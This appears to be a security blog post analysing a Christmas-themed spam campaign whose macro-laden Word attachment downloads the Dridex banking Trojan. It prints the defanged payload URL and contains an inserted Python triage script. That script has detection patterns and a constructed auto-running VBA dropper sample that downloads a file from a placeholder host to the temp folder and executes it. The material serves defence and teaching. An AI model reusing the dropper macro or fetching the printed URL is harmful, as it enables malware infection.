Spammers are using the theme of the season in their latest attempt to infect computers worldwide.
The email is accompanied by a Word document with a catchy name: CHRISTMAS OFFERS.docx
It might be tempting to open the file to see what these offers are all about. However, the document is blank and requires the user to enable macros in order to view it.
By default Microsoft Office disables macros, a handy automation feature but also a huge security risk.
This is where the social engineering comes in: the crooks are counting on people being so eager to see the promised content that they will push the button and get infected.
Macros enable you to create scripts that automate repetitive tasks within a document, for example copying content from one page and pasting it with a different font and color on another.
At the same time, a macro can be used to perform a malicious action, which happens to be the case here.
The authors have in fact created several macros:
One might want to see what they look like by clicking the Edit button, but the crooks password-protected the code:
This is not a problem though. We can use a tool called OfficeMalScanner to extract the macros:
The extracted code can be opened in a text editor for full review. This is VBA code (Visual Basic for Applications) which makes interesting API calls, such as downloading a file, any file, from an external URL (do you see the security implications of this?).
All the user has to do is click Enable Content, or Enable Macros, for this malicious code to launch its payload.
What happens if you were to trust the document?
A remote file is downloaded from
hxxp://jasoncurtis.co.uk/js/bin.exe
and run from the temp folder:
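The review step described above, reading extracted VBA for download, execution and temp-folder staging, can be partly automated. The following is an added example (not Malwarebytes' tooling and not the campaign's actual macro code): a small triage script that scans a macro module's text for auto-run entry points and the capabilities a reviewer would flag, and returns a score and verdict. The two macro sources, the indicator list and the weights are all constructed for this illustration; the URL in the sample is a placeholder.

```python
"""Heuristic triage of extracted VBA macro text (added example, not from the post)."""
import re

# Macro names that Office runs automatically once content is enabled.
# Assumption: this covers the common Word/Excel entry points; it is not exhaustive.
AUTOEXEC_RE = re.compile(
    r"\b(?:Sub|Function)\s+(AutoOpen|Document_Open|AutoExec|AutoNew|"
    r"Workbook_Open|Auto_Open)\b",
    re.IGNORECASE,
)

# Capabilities a reviewer looks for in extracted VBA, with this example's own
# weights (a constructed heuristic, not a published scoring scheme).
INDICATORS = {
    "download":    (3, re.compile(r"URLDownloadToFile|MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest", re.I)),
    "execute":     (3, re.compile(r"\bShell\b|WScript\.Shell|ShellExecute|Shell\.Application", re.I)),
    "temp_path":   (1, re.compile(r"Environ\s*\(\s*\"(?:TEMP|TMP|APPDATA)\"\s*\)", re.I)),
    "url":         (1, re.compile(r"https?://[^\s\"']+", re.I)),
    "obfuscation": (1, re.compile(r"\bChr\s*\(|\bStrReverse\s*\(|\bXor\b", re.I)),
}

SUSPICIOUS_THRESHOLD = 5


def triage_vba(source: str) -> dict:
    """Return auto-run entry points, indicator hits, a score and a verdict for one VBA module."""
    autoexec = sorted({m.group(1) for m in AUTOEXEC_RE.finditer(source)})
    hits = {}
    score = 2 * len(autoexec)  # each auto-run entry point adds 2
    for name, (weight, pattern) in INDICATORS.items():
        found = sorted({m.group(0) for m in pattern.finditer(source)})
        if found:
            hits[name] = found
            score += weight
    # Download followed by execution is the classic dropper pattern; weight it extra.
    chain = "download" in hits and "execute" in hits
    if chain:
        score += 2
    verdict = "suspicious" if score >= SUSPICIOUS_THRESHOLD else "benign"
    return {
        "autoexec": autoexec,
        "hits": hits,
        "download_and_execute": chain,
        "score": score,
        "verdict": verdict,
    }


# Constructed sample: an auto-running macro that downloads a file to %TEMP% and runs it.
# The URL is a placeholder, not the campaign's real address.
SAMPLE_DROPPER = r'''
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub AutoOpen()
    Dim target As String
    target = Environ("TEMP") & "\bin.exe"
    URLDownloadToFile 0, "http://example.invalid/js/bin.exe", target, 0, 0
    Shell target, vbHide
End Sub
'''

# Constructed sample: a harmless formatting macro of the kind the post mentions.
BENIGN_MACRO = r'''
Sub FormatHeadings()
    Dim p As Paragraph
    For Each p In ActiveDocument.Paragraphs
        If p.Style = "Heading 1" Then p.Range.Font.Color = wdColorBlue
    Next p
End Sub
'''

if __name__ == "__main__":
    for label, src in (("sample_dropper", SAMPLE_DROPPER), ("benign_formatter", BENIGN_MACRO)):
        result = triage_vba(src)
        print(f"{label}: {result['verdict']} (score {result['score']})")
        for name, found in result["hits"].items():
            print(f"  {name}: {', '.join(found)}")
```

Run it on the text that OfficeMalScanner (or any other macro extractor) produces. A benign formatting macro scores zero, while the download-to-temp-and-run pattern lights up every category at once; the point of the score is to prioritise which modules get a human read, not to replace one.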
It is known as Dridex, a banking Trojan already detected by Malwarebytes Anti-Malware.
Macro malware often relies on social engineering to convince the mark to open a file and disable the default protection.
It is not terribly sophisticated, yet it has seen a bit of a revival in recent months, with spam being the preferred delivery method.
The best protection against these types of threats is to be particularly cautious before opening attachments, even if they are ‘classic’ Microsoft Office documents.
Users of Malwarebytes Anti-Exploit Premium were already protected against this attack thanks to MBAE’s signature-less engine:
This holiday season, whether you believe in Santa or not, please be extra cautious with offers that sound too good to be true. The bad guys like to make believe, but we’d rather leave them empty handed or send them off with a lump of coal.
This doesn’t seem to be up to their usual slick standards. But the Christmas season and New Year’s haven’t gone by yet. So hold on to your credit cards.
Is it possible this current scam is an example of the Dirt Bag unit in-training? We all know the Russians trained Jihadis in the Libyan desert in the 70’s. After all you can’t have the only once Dirtbag training in cyber terrorism. What do you think ?
I don’t think so. Criminals seem to operate with the least amount of risk to themselves. This isn’t a religious or political operation, just one that aims to take as much money as possible from anyone that opens the file.
Look people you are just trying to get your face on the internet. So can you control your vanity long enough to understand some criminal loves you and your private information and all the credit card numbers he can steal?? Get a grip! Leave the vanity stuff to Kim Kardashian. lol